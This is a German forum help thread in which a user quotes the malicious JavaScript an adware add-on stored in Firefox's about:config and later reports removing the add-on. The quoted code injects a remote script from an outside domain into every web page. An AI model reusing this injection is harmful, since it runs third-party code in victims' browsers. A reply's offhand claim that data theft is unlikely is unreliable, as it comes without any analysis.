|
Schädling der String Wert in Firefox about:config erstellt - was bewirkt der Eintrag? Hallo, nachdem ich hier schon öfter Hilfe ohne neuen Thread finden konnte habe ich jetzt doch eine Frage. Ich habe mir einen Schädling eingefangen der einen String Wert im Firefox erstellt. Die Entfernung läuft gerade, mich würde aber interessieren was der Eintrag genau bewirkt. Klingt nach Programmier- oder Scriptsprache. Die geänderte Einstellung heißt: extensions.FaMbl.scode Der Typ ist wie gesagt String Der genaue Wert ist sehr lang und lautet: Code: if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//i.74055djs.info/74055d/javascript.js?channel=p714&hid=0';document.getElementsByTagName("head")[0].appendChild(script);};if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}Was hier nun aber genau passieren soll ist mir ein Rätsel. :confused: Würde mich über Aufklärung freuen. Den Weg zur Entfernung habe ich hier gefunden: h**p://www.technicalforum.org/windows/my-web-browser-firefox-getting-slow-status-bar-shows-connecting-i74055djsinfo Interessant ist dass man ohne Schädlingssuche den Wert zwar zurücksetzen kann er aber nach Neustart des Firefox wieder wie oben beschrieben erscheint. |
hi, bin kein Programmierer, also kann ich bei dem Code nicht helfen, aber bei der Bereinigung. |
Danke, klingt gut. Ich versuche erst mal den Weg den ich gefunden habe. Falls dieser nicht den gewünschten Effekt bringt gebe ich Rückmeldung. [edit]Ok, Javascript...[/edit] Hm........mit Avast gescannt, neun Bedrohungen entfernt, Malwarebytes Anti Malware hat auch noch eine gefunden......und trotzdem stellt sich der String Wert nach Zurücksetzen immer wieder um. :headbang: Im Moment läuft der Housecall von Trendmicro. Wäre es sinnvoll die Scans im abgesicherten Modus laufen zu lassen? Ok, Problem gelöst.....war ein Firefox Addon installiert namens Savenshareee. Dieses habe ich deinstalliert, Emisoft, Malwarebytes und Avast sind zufrieden und der String bleibt zurück gesetzt. |
ok :) |
Nichtsdestotrotz würde mich immer noch interessieren was genau dieses Script nun getan hat. Muss ich mir Sorgen um meine Daten machen? |
Wie gesagt, bin kein Programmierer, aber dass das Teil Daten stiehlt halte ich für unwarscheinlich. |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 22:13 Uhr. |
Copyright ©2000-2025, Trojaner-Board